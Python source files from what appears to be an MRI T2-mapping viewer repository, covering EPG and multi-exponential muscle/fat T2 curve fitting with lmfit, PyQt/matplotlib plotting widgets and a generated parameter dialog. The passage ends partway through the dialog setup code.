# -*- coding: utf-8 -*- """ Created on Sat Mar 3 11:30:41 2018 @author: ERIC """ import numpy as np import lmfit from epg import cpmg_epg_b1 as cpmg_epg_b1_c from scipy import integrate mxyz90 = np.fromfile( 'epg/mxyz90.txt', sep=' ' ) mxyz180 = np.fromfile('epg/mxyz180.txt', sep=' ') mxyz90 = mxyz90.reshape(5,512) mxyz180 = mxyz180.reshape(5,512) offset=130 step=10 epg_slice_xxx =mxyz90[0][offset:-offset+step:step] # mm epg_p90 = mxyz90[-1][offset:-offset+step:step] # degrees epg_p180 = mxyz180[-1][offset:-offset+step:step] # degrees epg_dx=epg_slice_xxx[1]-epg_slice_xxx[0] def fit_cpmg_epg_muscle_philips_hargreaves_c( params, xxx, dx, p90_array, p180_array, yyy_exp=None): parvals = params.valuesdict() T1fat = parvals[ 'T1fat' ] # fixed T1muscle = parvals[ 'T1muscle' ] # fixed echo = parvals[ 'echo' ] # fixed T2fat = parvals[ 'T2fat' ] # fixed/optimized T2muscle = parvals['T2muscle'] # optimized Afat = parvals[ 'Afat'] # optimized Amuscle = parvals['Amuscle'] # optimized B1scale = parvals['B1scale'] Nechos = len(xxx) Ngauss = len(p90_array) signal = np.zeros([Ngauss,Nechos]) fat_signal = np.zeros(Nechos) muscle_signal = np.zeros(Nechos) for i,(p90,p180) in enumerate(zip(p90_array,p180_array)): cpmg_epg_b1_c( fat_signal, p90, p180, T1fat, T2fat, echo, B1scale ) cpmg_epg_b1_c( muscle_signal, p90, p180, T1muscle, T2muscle, echo, B1scale ) signal[i] = Afat*fat_signal+Amuscle*muscle_signal int_signal = integrate.simps(signal, dx=dx,axis=0) if isinstance(yyy_exp, np.ndarray): return( int_signal-yyy_exp) else: return(int_signal) def calculate_T2values_on_slice_muscleEPG(lmparams, yyy_exp): # params = lmfit.Parameters() # params.add('T2fat', value = 180.0, min=0, max=5000, vary=False) # params.add('T2muscle', value = 35, min=0, max=100, vary=True ) # params.add('Afat', value = 0.01, min=0, max=10, vary=True ) # params.add('Amuscle', value = 0.1, min=0, max=10, vary=True ) # params.add('T1fat', value = 365.0, vary=False) # params.add('T1muscle', value = 1400, vary=False) # params.add('echo', value = 10.0, vary=False) params = lmparams['epgt2fitparams'] echo_time = params['echo'].value num_echoes = yyy_exp.size parvals = params.valuesdict() print("parvals") for k,v in parvals.items(): print(k,v) print("EPG echo time =", echo_time) xxx = np.linspace( echo_time, echo_time*num_echoes, num_echoes) dx = xxx[1]-xxx[0] yyy_exp_max =yyy_exp.max() if yyy_exp_max == 0: yyy_exp_max = 1.0 yyy_exp_norm = yyy_exp/yyy_exp_max fitModel = lmfit.Minimizer(fit_cpmg_epg_muscle_philips_hargreaves_c, lmparams['epgt2fitparams'], fcn_args=( xxx, dx, epg_p90, epg_p180, yyy_exp_norm)) results = fitModel.minimize() fit_plot = np.zeros(num_echoes) if results.success: fit_plot = results.residual + yyy_exp_norm return( fit_plot, yyy_exp_norm, results, xxx) def calculate_T2values_on_slice_muscleAzz(lmparams, yyy_exp): params = lmparams['azzt2fitparams'] echo_time = params['echo'].value num_echoes = yyy_exp.size model = lmfit.models.ExpressionModel('Afat * (c_l*exp(-x/t2_fl)+c_s*exp(-x/t2_fs)) + Amuscle * (exp(-x/T2muscle))') parvals = params.valuesdict() print("parvals") for k,v in parvals.items(): print(k,v) print("azzabou echo time", echo_time) # saved_output = {'T2muscle_value': [], # 'T2muscle_stderr': [], # 'Amuscle_value': [], # 'Amuscle_stderr': [], # 'Afat_value': [], # 'Afat_stderr': [], # 'chisqr': [], # 'redchi':[], # 'AIC':[], # 'BIC':[], # 'slice':[], # 'pixel_index':[], # } xxx = np.linspace( echo_time, echo_time*num_echoes, num_echoes) yyy_exp_max = yyy_exp.max() fit_plot = np.zeros(num_echoes-2) if yyy_exp_max == 0.0: yyy_exp_max = 1.0 yyy_exp_norm = yyy_exp/yyy_exp_max print("fitting data") results = model.fit(yyy_exp_norm[2:] , x=xxx[2:], params=lmparams['azzt2fitparams']) #mi.plot() #saved_output['name'].append('t2_m') # saved_output['T2muscle_value'].append(results.params['T2muscle'].value) # saved_output['T2muscle_stderr'].append(results.params['T2muscle'].stderr) # saved_output['chisqr'].append(results.chisqr) # saved_output['redchi'].append(results.redchi) # saved_output['AIC'].append(results.aic) # saved_output['BIC'].append(results.bic) # # # saved_output['Amuscle_value'].append(results.params['Amuscle'].value) # saved_output['Amuscle_stderr'].append(results.params['Amuscle'].stderr) # saved_output['Afat_value'].append(results.params['Afat'].value) # saved_output['Afat_stderr'].append(results.params['Afat'].stderr) fit_plot = results.residual + yyy_exp_norm[2:] return( fit_plot, yyy_exp_norm, results, xxx)
Python
166
30.728916
155
/t2fit.py
0.573375
0.539311
EricHughesABC/T2EPGviewer
refs/heads/master
# -*- coding: utf-8 -*- """ Created on Wed Feb 28 13:11:07 2018 @author: neh69 """ import sys import numpy as np #import matplotlib import pandas as pd #import mplcursors from uncertainties import ufloat import t2fit import lmfit as lm from matplotlib import pyplot as plt #import seaborn as sns from matplotlib.backends.qt_compat import QtCore, QtWidgets, is_pyqt5 import seaborn as sns if is_pyqt5(): print("pyqt5") from matplotlib.backends.backend_qt5agg import ( FigureCanvas, NavigationToolbar2QT as NavigationToolbar) else: print("pyqt4") from matplotlib.backends.backend_qt4agg import ( FigureCanvas, NavigationToolbar2QT as NavigationToolbar) from matplotlib.figure import Figure from ImageData import T2imageData import epgT2paramsDialog import azzT2paramsDialog #mxyz90 = np.fromfile( 'epg\mxyz90.txt', sep=' ' ) #mxyz180 = np.fromfile('epg\mxyz180.txt', sep=' ') # #mxyz90 = mxyz90.reshape(5,512) #mxyz180 = mxyz180.reshape(5,512) # #offset=130 #step=10 #epg_slice_xxx =mxyz90[0][offset:-offset+step:step] # mm #epg_p90 = mxyz90[-1][offset:-offset+step:step] # degrees #epg_p180 = mxyz180[-1][offset:-offset+step:step] # degrees #epg_dx=epg_slice_xxx[1]-epg_slice_xxx[0] class PlotWidget(QtWidgets.QWidget): def __init__(self, parent=None, showToolbar=True): super(PlotWidget,self).__init__(parent) fig =Figure(figsize=(3, 5)) fig.set_tight_layout(True) self.plot_canvas = FigureCanvas(fig) self.ax = fig.add_subplot(111) self.layout = QtWidgets.QVBoxLayout(self) self.layout.addWidget(self.plot_canvas) if showToolbar: self.toolbar = NavigationToolbar(self.plot_canvas, self) self.layout.addWidget(self.toolbar) def return_ax(self): return(self.ax) class HistogramPlotWidget(PlotWidget): def __init__(self, parent=None, showToolbar=False, mri_plot=None, data_df=None, image_size=256): self.data_df = data_df self.image_size = image_size super(HistogramPlotWidget,self).__init__(parent=parent, showToolbar=showToolbar) self.buttonUpdate = QtWidgets.QPushButton('Update') self.buttonUpdate.clicked.connect(self.update) self.layout.addWidget(self.buttonUpdate) def update(self): print((self.ax.get_xlim())) xmin,xmax = self.ax.get_xlim() def update_plot(self, slice_info,data_dframes, plot_param): self.ax.cla() self.plot_canvas.draw() print("Entered HistogramPlotWidget.update_image, plot_param =", plot_param) data_df=None slice_displayed = slice_info[0] T2_slices = slice_info[1] dixon_slices = slice_info[2] print("data_dframes[0]", type(data_dframes[0]), data_dframes[0].columns) print("data_dframes[1]", type(data_dframes[1]), data_dframes[1].columns) if isinstance(data_dframes[0],pd.core.frame.DataFrame): if plot_param in data_dframes[0].columns: print("plot_param {} found in dataframe is T2".format(plot_param)) data_df = data_dframes[0] data_df=data_df[data_df["slice"]==slice_displayed] elif isinstance(data_dframes[1],pd.core.frame.DataFrame): print("plot_param {} found in dataframe is Dixon".format(plot_param)) print("data_dframes[1].columns",data_dframes[1].columns) if plot_param in data_dframes[1].columns: print("plot_param in data_dframes[1]:", plot_param) data_df = data_dframes[1] if slice_displayed in T2_slices: slice_displayed = dixon_slices[T2_slices.index(slice_displayed)] data_df=data_df[data_df["slice"]==slice_displayed] else: print( "HIST", plot_param, " not found") return False else: print("HIST", isinstance(data_dframes[1],pd.core.frame.DataFrame)) return False print("HIST data_df.shape[0]",data_df.shape[0]) if data_df.shape[0] == 0 or type(data_df) == type(None): print("HIST return because df shape[0] = 0 or type of data_df = type None") return False # self.ax2.cla() if isinstance(data_df, pd.core.frame.DataFrame): print("Plotting HIST Plot" ) data_df = data_df.sort_values(by=['roi']) #plot_param = "T2value" for roi in data_df.roi.unique(): print(roi) query_str = '(slice == {}) and (roi == "{}")'.format(slice_displayed, roi) sns.distplot(data_df.query(query_str)[plot_param], hist=False, label=roi, ax=self.ax) # self.ax.hist( data_df.query(query_str)[plot_param], bins=100, label=roi, alpha=0.7); self.ax.legend() if plot_param == "T2m": self.ax.set_xlabel("$T_2$ [ms]") elif plot_param == "Am100": self.ax.set_xlabel("$A_m$ [%]") elif plot_param == "Af100": self.ax.set_xlabel("$A_f$ [%]") elif plot_param == "B1": self.ax.set_xlabel("$B_1$") elif plot_param == "fatPC": self.ax.set_xlabel("ff [%]") self.ax.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.) self.plot_canvas.draw() return True class BarPlotWidget(PlotWidget): def __init__(self, parent=None, showToolbar=True, data_df=None, image_size=256): self.data_df = data_df self.image_size = image_size super(BarPlotWidget,self).__init__(parent=parent, showToolbar=showToolbar) # self.buttonUpdate = QtWidgets.QPushButton('Update') # self.buttonUpdate.clicked.connect(self.update) # self.layout.addWidget(self.buttonUpdate) def update(self): print((self.ax.get_xlim())) xmin,xmax = self.ax.get_xlim() def update_plot(self, slice_info,data_dframes, plot_param): self.ax.cla() self.plot_canvas.draw() print("Entered BarPlotWidget.update_image, plot_param =", plot_param) #print(data_.columns) slice_displayed = slice_info[0] T2_slices = slice_info[1] dixon_slices = slice_info[2] data_df=None print("data_dframes[0]", type(data_dframes[0]), data_dframes[0].columns) print("data_dframes[1]", type(data_dframes[1]), data_dframes[1].columns) if isinstance(data_dframes[0],pd.core.frame.DataFrame): if plot_param in data_dframes[0].columns: print("plot_param {} found in dataframe is T2".format(plot_param)) data_df = data_dframes[0] data_df=data_df[data_df["slice"]==slice_displayed] elif isinstance(data_dframes[1],pd.core.frame.DataFrame): print("plot_param {} found in dataframe is Dixon".format(plot_param)) print("data_dframes[1].columns",data_dframes[1].columns) if plot_param in data_dframes[1].columns: print("plot_param in data_dframes[1]:", plot_param) data_df = data_dframes[1] if slice_displayed in T2_slices: slice_displayed = dixon_slices[T2_slices.index(slice_displayed)] # else: # dixon_slice = slice_displayed # slice_displayed = dixon_slices[T2_slices.index(slice_displayed)] data_df=data_df[data_df["slice"]==slice_displayed] else: print( plot_param, " not found") return(False) else: print(isinstance(data_dframes[1],pd.core.frame.DataFrame)) return(False) print("HIST data_df.shape[0]", data_df.shape[0]) if data_df.shape[0] == 0 or type(data_df) == type(None): print("return because df shape[0] = 0 or type of data_df = type None") return False data_df = data_df.sort_values(by=['roi']) if isinstance(data_df, pd.core.frame.DataFrame): print("Plotting BAR Plot" ) #plot_param = "T2value" # for roi in data_df.roi.unique(): # print(roi) # query_str = '(slice == {}) and (roi == "{}")'.format(slice_displayed, roi) # self.ax.hist( data_df.query(query_str)[plot_param], bins=100, label=roi, alpha=0.4); # self.ax.legend() # numRois = data_df.roi.unique().shape[0] sns.catplot( kind='bar', x='slice', y=plot_param, data=data_df, hue='roi', ci="sd", ax=self.return_ax() ); self.ax.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.) if plot_param == "T2m": self.ax.set_ylabel("$T_2$ [ms]") elif plot_param == "Am100": self.ax.set_ylabel("$A_m$ [%]") elif plot_param == "Af100": self.ax.set_ylabel("$A_f$ [%]") elif plot_param == "B1": self.ax.set_ylabel("$B_1$") elif plot_param == "fatPC": self.ax.set_ylabel("ff [%]") self.ax.set_xlabel("slices") # plt.tight_layout() self.plot_canvas.draw() return True class T2PlotWidget(PlotWidget): def __init__( self, lmparams, parent=None, showToolbar=True): super(T2PlotWidget, self).__init__(parent, showToolbar=showToolbar) self.plot_T2_startup() self.lmparams = lmparams self.T2epgnorm_btns = radiobuttons_EPGWidget(self.lmparams, self) self.layout.addWidget(self.T2epgnorm_btns) def plot_T2_startup(self): ttt = np.linspace(0,170, 17) yyy = 80*np.exp(-ttt/35.0)+20*np.exp(-ttt/120.0) yyy1 = yyy+np.random.randn(len(yyy)) self.ax.semilogy(ttt, yyy1, 'o') self.ax.semilogy(ttt, yyy, '-') self.ax.set_xlabel('Time [ms]') self.ax.set_ylabel('Signal') self.ax.set_ylim(1,110) def update_plot(self, xcoord, ycoord, t2data): print("update_T2PlotImag called") #self.ttt = np.linspace(0,170, 17) self.ax.cla() # clear the plot area if self.T2epgnorm_btns.epg_rbtn.isChecked(): print("Run EPG Fit") print('echo value', self.lmparams['epgt2fitparams']['echo']) # params = lm.Parameters() # params.add('T2fat', value = 180.0, min=0, max=5000, vary=False) # params.add('T2muscle', value = 35, min=0, max=100, vary=True ) # params.add('Afat', value = 0.01, min=0, max=10, vary=True ) # params.add('Amuscle', value = 0.1, min=0, max=10, vary=True ) # params.add('T1fat', value = 365.0, vary=False) # params.add('T1muscle', value = 1400, vary=False) # params.add('echo', value = 10.0, vary=False) #xxx = np.linspace(10,10*len(t2data), len(t2data)) # self.params.pretty_print() #fit_values, fit_curve, fit_data, lmresults = t2fit.calculate_T2values_on_slice_muscleEPG(self.lmparams, t2data, len(t2data), xxx, epg_dx, epg_p90, epg_p180) fit_curve, fit_data, lmresults, xxx = t2fit.calculate_T2values_on_slice_muscleEPG(self.lmparams, t2data) else: print("Run Normal T2 Fit") fit_curve, fit_data, lmresults, xxx = t2fit.calculate_T2values_on_slice_muscleAzz(self.lmparams,t2data) print(dir(lmresults)) print(lmresults.success) if not lmresults.success: return # # Create uncertainty floats of varied params # ufs = {} for vname in lmresults.var_names: v = lmresults.params[vname].value e = lmresults.params[vname].stderr ufs[vname] = ufloat( v,e) if ('Amuscle' in ufs.keys()) and ('Afat' in ufs.keys()): ufs['Amuscle'] = 100.0*ufs['Amuscle']/(ufs['Amuscle']+ufs['Afat']) ufs['Afat'] = 100.0-ufs['Amuscle'] t2m_str = "" t2f_str = "" Am_str = "" Af_str = "" B1_str = "" for name, value in ufs.items(): print(name) if name == 'T2muscle': t2m_str = "$T_{{2m}}$ = ${:5.2fL}$ ms\n".format(value) elif name == 'T2fat': t2f_str = "$T_{{2f}}$ = ${:5.2fL}$ ms\n".format(value) elif name == 'Amuscle': Am_str = "$A_m$ = ${:5.2fL}$\n".format(value) elif name == 'Afat': Af_str = "$A_f$ = ${:5.2fL}$\n".format(value) elif name == 'B1scale': B1_str = "$B_1$ scale = ${:5.2fL}$\n".format(value) results_legend = "{}{}{}{}{}".format(t2m_str, t2f_str, Am_str, Af_str, B1_str) if self.T2epgnorm_btns.epg_rbtn.isChecked(): self.ax.semilogy(xxx, 100*fit_data, 'o') self.ax.semilogy(xxx, 100*fit_curve, '-', label=results_legend) else: self.ax.semilogy(xxx[2:], 100*fit_curve, '-', label=results_legend) self.ax.semilogy(xxx, 100*fit_data, 'o') self.ax.legend( fontsize=8) #self.ax.set_ylim(1,110) self.ax.set_xlabel('Time [ms]') self.ax.set_ylabel('Signal') self.ax.set_ylim(0.5,150) self.plot_canvas.draw() class radiobuttons_EPGWidget(QtWidgets.QWidget): def __init__(self, lmparams, parent=None): self.lmparams = lmparams self.epgDialog = QtWidgets.QDialog() self.epgT2params_widget = epgT2paramsDialog.EpgT2paramsDialog(self.lmparams) self.epgT2params_widget.setupEpgT2paramsDialog(self.epgDialog) self.azzDialog = QtWidgets.QDialog() self.azzT2params_widget = azzT2paramsDialog.AzzT2paramsDialog(self.lmparams) self.azzT2params_widget.setupAzzT2paramsDialog(self.azzDialog) super(radiobuttons_EPGWidget, self).__init__(parent) hlayout = QtWidgets.QHBoxLayout(self) group_rbtns = QtWidgets.QButtonGroup() group_rbtns.exclusive() self.epg_rbtn = QtWidgets.QRadioButton("EPG T2") self.norm_rbtn = QtWidgets.QRadioButton("normal T2") self.norm_rbtn.setChecked(True); self.T2params_btn = QtWidgets.QPushButton("T2 Parameters") self.epg_rbtn.fittingParam = "epg" self.norm_rbtn.fittingParam= 'norm' self.epg_rbtn.toggled.connect(lambda:self.btnstate(self.epg_rbtn)) self.norm_rbtn.toggled.connect(lambda:self.btnstate(self.norm_rbtn)) self.T2params_btn.clicked.connect(self.T2params_btn_clicked) group_rbtns.addButton(self.epg_rbtn) group_rbtns.addButton(self.norm_rbtn) hlayout.addWidget(self.norm_rbtn) hlayout.addWidget(self.epg_rbtn) hlayout.addStretch(1) hlayout.addWidget(self.T2params_btn) def T2params_btn_clicked(self): print("T2params_btn_clicked") if self.epg_rbtn.isChecked(): rt = self.epgDialog.show() else: rt = self.azzDialog.show() print("rt =", rt) def btnstate(self,b): if b.isChecked(): print(b.text()) print(b.fittingParam) #self.mri_window.on_fittingParams_rbtn_toggled( str(b.fittingParam)) class radiobuttons_fitWidget(QtWidgets.QWidget): def __init__(self, parent=None, mri_window=None): super(radiobuttons_fitWidget, self).__init__(parent) self.mri_window = mri_window vbox1_radiobuttons = QtWidgets.QVBoxLayout(self) group_fittingParams_rbtns = QtWidgets.QButtonGroup() group_fittingParams_rbtns.exclusive() self.T2_rbtn = QtWidgets.QRadioButton("T2") self.Am_rbtn = QtWidgets.QRadioButton("Am") self.Af_rbtn = QtWidgets.QRadioButton("Af") self.B1_rbtn = QtWidgets.QRadioButton("B1") self.Dixon_rbtn = QtWidgets.QRadioButton("Dixon Fat [%]") self.T2_rbtn.setChecked(True) self.T2_rbtn.fittingParam = "T2m" self.Am_rbtn.fittingParam = "Am100" self.Af_rbtn.fittingParam = "Af100" self.B1_rbtn.fittingParam = "B1" self.Dixon_rbtn.fittingParam = "fatPC" self.T2_rbtn.toggled.connect(lambda:self.btnstate(self.T2_rbtn)) self.Am_rbtn.toggled.connect(lambda:self.btnstate(self.Am_rbtn)) self.Af_rbtn.toggled.connect(lambda:self.btnstate(self.Af_rbtn)) self.B1_rbtn.toggled.connect(lambda:self.btnstate(self.B1_rbtn)) self.Dixon_rbtn.toggled.connect(lambda:self.btnstate(self.Dixon_rbtn)) group_fittingParams_rbtns.addButton(self.T2_rbtn) group_fittingParams_rbtns.addButton(self.Am_rbtn) group_fittingParams_rbtns.addButton(self.Af_rbtn) group_fittingParams_rbtns.addButton(self.B1_rbtn) group_fittingParams_rbtns.addButton(self.Dixon_rbtn) vbox1_radiobuttons.addWidget(self.T2_rbtn) vbox1_radiobuttons.addWidget(self.Am_rbtn) vbox1_radiobuttons.addWidget(self.Af_rbtn) vbox1_radiobuttons.addWidget(self.B1_rbtn) vbox1_radiobuttons.addWidget(self.Dixon_rbtn) vbox1_radiobuttons.addStretch(1) def btnstate(self,b): if b.isChecked(): print(b.text()) print(b.fittingParam) self.mri_window.on_fittingParams_rbtn_toggled( str(b.fittingParam)) class ApplicationWindow(QtWidgets.QMainWindow): def __init__(self, params): self.params = params imageData = T2imageData() print("imageData.fittingParam:",imageData.fittingParam) npts = 256*100 iii = np.random.permutation(np.arange(255*255))[:npts] ddd = np.random.randn(npts)*100+500 data_df = pd.DataFrame({'iii': iii, 'ddd':ddd}) super(ApplicationWindow, self).__init__() leftwindow = QtWidgets.QWidget() rightwindow = QtWidgets.QWidget() splitHwidget = QtWidgets.QSplitter(QtCore.Qt.Horizontal) #hlayout = QtWidgets.QHBoxLayout(self._main) hlayout = QtWidgets.QHBoxLayout(leftwindow) vlayout = QtWidgets.QVBoxLayout(rightwindow) mriplot_window = MRIPlotWidget(imageData=imageData) rbtns_window = radiobuttons_fitWidget(mri_window=mriplot_window) t2plot_window = T2PlotWidget( self.params, showToolbar=False) h1_window = PlotWidget( showToolbar=False) h2_window = HistogramPlotWidget(showToolbar=True) #hlayout.addWidget(mriplot_window) mriplot_window.register_PlotWidgets(t2plot_window, h1_window, h2_window) #vbox1_radiobuttons = QtWidgets.QVBoxLayout() # hbox.addLayout(vbox1_radiobuttons) # hbox.addLayout(vbox1_image) # hbox.addLayout(vbox2_image) hlayout.addWidget(rbtns_window) hlayout.addWidget(mriplot_window) vlayout.addWidget(t2plot_window) vlayout.addWidget(h1_window) vlayout.addWidget(h2_window) def func3(x, y): return (1 - x / 2 + x**5 + y**3) * np.exp(-(x**2 + y**2)) # make these smaller to increase the resolution dx, dy = 0.05, 0.05 x = np.arange(-3.0, 3.0, dx) y = np.arange(-3.0, 3.0, dy) X, Y = np.meshgrid(x, y) # when layering multiple images, the images need to have the same # extent. This does not mean they need to have the same shape, but # they both need to render to the same coordinate system determined by # xmin, xmax, ymin, ymax. Note if you use different interpolations # for the images their apparent extent could be different due to # interpolation edge effects extent = np.min(x), np.max(x), np.min(y), np.max(y) Z1 = np.add.outer(range(8), range(8)) % 2 # chessboard mriplot_window.return_ax().imshow(Z1, cmap=plt.cm.gray, interpolation='nearest', extent=extent) Z2 = func3(X, Y) mriplot_window.return_ax().imshow(Z2, cmap=plt.cm.viridis, alpha=.9, interpolation='bilinear', extent=extent) splitHwidget.addWidget(leftwindow) splitHwidget.addWidget(rightwindow ) print(data_df.head()) plot_image = np.zeros(255*255) plot_image[data_df['iii']] = data_df['ddd'] h1_window.return_ax().imshow( plot_image.reshape((255,255))) h1_window.return_ax().set_xlabel('x') h1_window.return_ax().set_ylabel('y') h2_window.return_ax().hist(ddd, bins=100) h2_window.return_ax().set_xlabel('x') h2_window.return_ax().set_ylabel('y') self.setCentralWidget(splitHwidget) def zoom(self): self.histtoolbar.zoom() def ax_changed(self,ax): old_xlim, old_ylim = self.lim_dict[ax] print("old xlim", old_xlim, "ylim", old_ylim) print("new xlim", ax.get_xlim(), "ylim", ax.get_ylim()) return np.all(old_xlim == ax.get_xlim()) and np.all(old_ylim == ax.get_ylim()) def onrelease(self,event): print("Active Toolbar button:",self.histtoolbar._active ) print("plot release") print(event) self.static_canvas.flush_events() changed_axes = [ax for ax in self.static_canvas.figure.axes if self.ax_changed(ax)] not_changed_axes = [ax for ax in self.static_canvas.figure.axes if not self.ax_changed(ax)] print("changed_axes",changed_axes) print("not_changed_axes",not_changed_axes) for ax in changed_axes: print("Changed xlim", ax.get_xlim(), "ylim", ax.get_ylim()) if __name__ == "__main__": epgt2fitparams = lm.Parameters() epgt2fitparams.add('T2fat', value = 180.0, min=0, max=5000, vary=False) epgt2fitparams.add('T2muscle', value = 35, min=0, max=100, vary=True ) epgt2fitparams.add('Afat', value = 0.2, min=0, max=10, vary=True ) epgt2fitparams.add('Amuscle', value = 0.8, min=0, max=10, vary=True ) epgt2fitparams.add('T1fat', value = 365.0, vary=False) epgt2fitparams.add('T1muscle', value = 1400, vary=False) epgt2fitparams.add('echo', value = 10.0, vary=False) qapp = QtWidgets.QApplication(sys.argv) app = ApplicationWindow(epgt2fitparams) app.show() qapp.exec_()
Python
703
31.364153
171
/visionplot_widgets.py
0.566313
0.543463
EricHughesABC/T2EPGviewer
refs/heads/master
# -*- coding: utf-8 -*- # Form implementation generated from reading ui file 'epg_fit_parameters_dialog.ui' # # Created by: PyQt5 UI code generator 5.6 # # WARNING! All changes made in this file will be lost! import lmfit as lm from PyQt5 import QtCore, QtGui, QtWidgets class EpgT2paramsDialog(object): def __init__(self, lmparams): self.lmparams = lmparams self.params = self.lmparams['epgt2fitparams'] def setupEpgT2paramsDialog(self, Dialog): self.Dialog = Dialog Dialog.setObjectName("Dialog") Dialog.resize(386, 284) self.buttonBox = QtWidgets.QDialogButtonBox(Dialog) self.buttonBox.setGeometry(QtCore.QRect(60, 250, 321, 23)) self.buttonBox.setOrientation(QtCore.Qt.Horizontal) self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok) self.buttonBox.setObjectName("buttonBox") self.widget = QtWidgets.QWidget(Dialog) self.widget.setGeometry(QtCore.QRect(20, 10, 361, 231)) self.widget.setObjectName("widget") self.gridLayout = QtWidgets.QGridLayout(self.widget) self.gridLayout.setContentsMargins(0, 0, 0, 0) self.gridLayout.setObjectName("gridLayout") self.fatT1value = QtWidgets.QLineEdit(self.widget) self.fatT1value.setValidator(QtGui.QDoubleValidator()) self.fatT1value.setObjectName("fatT1value") self.gridLayout.addWidget(self.fatT1value, 7, 1, 1, 1) self.muscleFractionMax = QtWidgets.QLineEdit(self.widget) self.muscleFractionMax.setValidator(QtGui.QDoubleValidator()) self.muscleFractionMax.setObjectName("muscleFractionMax") self.gridLayout.addWidget(self.muscleFractionMax, 3, 3, 1, 1) self.optimizeMuscleFraction = QtWidgets.QCheckBox(self.widget) self.optimizeMuscleFraction.setText("") self.optimizeMuscleFraction.setChecked(True) self.optimizeMuscleFraction.setObjectName("optimizeMuscleFraction") self.gridLayout.addWidget(self.optimizeMuscleFraction, 3, 4, 1, 1) self.fatFractionMin = QtWidgets.QLineEdit(self.widget) self.fatFractionMin.setValidator(QtGui.QDoubleValidator()) self.fatFractionMin.setObjectName("fatFractionMin") self.gridLayout.addWidget(self.fatFractionMin, 4, 2, 1, 1) self.fatFractionMax = QtWidgets.QLineEdit(self.widget) self.fatFractionMax.setValidator(QtGui.QDoubleValidator()) self.fatFractionMax.setObjectName("fatFractionMax") self.gridLayout.addWidget(self.fatFractionMax, 4, 3, 1, 1) self.b1scaleMax = QtWidgets.QLineEdit(self.widget) self.b1scaleMax.setValidator(QtGui.QDoubleValidator()) self.b1scaleMax.setObjectName("b1scaleMax") self.gridLayout.addWidget(self.b1scaleMax, 5, 3, 1, 1) self.muscleFractionMin = QtWidgets.QLineEdit(self.widget) self.muscleFractionMin.setValidator(QtGui.QDoubleValidator()) self.muscleFractionMin.setObjectName("muscleFractionMin") self.gridLayout.addWidget(self.muscleFractionMin, 3, 2, 1, 1) self.b1scaleValue = QtWidgets.QLineEdit(self.widget) self.b1scaleValue.setValidator(QtGui.QDoubleValidator()) self.b1scaleValue.setObjectName("b1scaleValue") self.gridLayout.addWidget(self.b1scaleValue, 5, 1, 1, 1) self.b1scaleMin = QtWidgets.QLineEdit(self.widget) self.b1scaleMin.setValidator(QtGui.QDoubleValidator()) self.b1scaleMin.setObjectName("b1scaleMin") self.gridLayout.addWidget(self.b1scaleMin, 5, 2, 1, 1) self.fatFractionLabel = QtWidgets.QLabel(self.widget) self.fatFractionLabel.setObjectName("fatFractionLabel") self.gridLayout.addWidget(self.fatFractionLabel, 4, 0, 1, 1) self.fatFractionValue = QtWidgets.QLineEdit(self.widget) self.fatFractionValue.setValidator(QtGui.QDoubleValidator()) self.fatFractionValue.setObjectName("fatFractionValue") self.gridLayout.addWidget(self.fatFractionValue, 4, 1, 1, 1) self.muscleT1label = QtWidgets.QLabel(self.widget) self.muscleT1label.setObjectName("muscleT1label") self.gridLayout.addWidget(self.muscleT1label, 6, 0, 1, 1) self.fatT2min = QtWidgets.QLineEdit(self.widget) self.fatT2min.setValidator(QtGui.QDoubleValidator()) self.fatT2min.setObjectName("fatT2min") self.gridLayout.addWidget(self.fatT2min, 2, 2, 1, 1) self.maxHeadingLabel = QtWidgets.QLabel(self.widget) self.maxHeadingLabel.setObjectName("maxHeadingLabel") self.gridLayout.addWidget(self.maxHeadingLabel, 0, 3, 1, 1) self.minHeadingLabel = QtWidgets.QLabel(self.widget) self.minHeadingLabel.setObjectName("minHeadingLabel") self.gridLayout.addWidget(self.minHeadingLabel, 0, 2, 1, 1) self.valueHeadingLabel = QtWidgets.QLabel(self.widget) self.valueHeadingLabel.setObjectName("valueHeadingLabel") self.gridLayout.addWidget(self.valueHeadingLabel, 0, 1, 1, 1) self.fatT2value = QtWidgets.QLineEdit(self.widget) self.fatT2value.setValidator(QtGui.QDoubleValidator()) self.fatT2value.setObjectName("fatT2value") self.gridLayout.addWidget(self.fatT2value, 2, 1, 1, 1) self.optimizeFatT2 = QtWidgets.QCheckBox(self.widget) self.optimizeFatT2.setText("") self.optimizeFatT2.setChecked(False) self.optimizeFatT2.setObjectName("optimizeFatT2") self.gridLayout.addWidget(self.optimizeFatT2, 2, 4, 1, 1) self.muscleT2value = QtWidgets.QLineEdit(self.widget) self.muscleT2value.setInputMethodHints(QtCore.Qt.ImhDigitsOnly|QtCore.Qt.ImhFormattedNumbersOnly) self.muscleT2value.setProperty("muscleValue", 0.0) self.muscleT2value.setProperty("number", 35.0) self.muscleT2value.setObjectName("muscleT2value") self.gridLayout.addWidget(self.muscleT2value, 1, 1, 1, 1) self.fatT2label = QtWidgets.QLabel(self.widget) self.fatT2label.setObjectName("fatT2label") self.gridLayout.addWidget(self.fatT2label, 2, 0, 1, 1) self.fatT2max = QtWidgets.QLineEdit(self.widget) self.fatT2max.setValidator(QtGui.QDoubleValidator()) self.fatT2max.setObjectName("fatT2max") self.gridLayout.addWidget(self.fatT2max, 2, 3, 1, 1) self.muscleT2max = QtWidgets.QLineEdit(self.widget) self.muscleT2max.setValidator(QtGui.QDoubleValidator()) self.muscleT2max.setObjectName("muscleT2max") self.gridLayout.addWidget(self.muscleT2max, 1, 3, 1, 1) self.opimizedHeadingLabel = QtWidgets.QLabel(self.widget) self.opimizedHeadingLabel.setObjectName("opimizedHeadingLabel") self.gridLayout.addWidget(self.opimizedHeadingLabel, 0, 4, 1, 1) self.muscleT2label = QtWidgets.QLabel(self.widget) self.muscleT2label.setObjectName("muscleT2label") self.gridLayout.addWidget(self.muscleT2label, 1, 0, 1, 1) self.muscleT2min = QtWidgets.QLineEdit(self.widget) self.muscleT2min.setInputMethodHints(QtCore.Qt.ImhFormattedNumbersOnly) self.muscleT2min.setObjectName("muscleT2min") self.gridLayout.addWidget(self.muscleT2min, 1, 2, 1, 1) self.optimizeMuscleT2 = QtWidgets.QCheckBox(self.widget) self.optimizeMuscleT2.setText("") self.optimizeMuscleT2.setChecked(True) self.optimizeMuscleT2.setObjectName("optimizeMuscleT2") self.gridLayout.addWidget(self.optimizeMuscleT2, 1, 4, 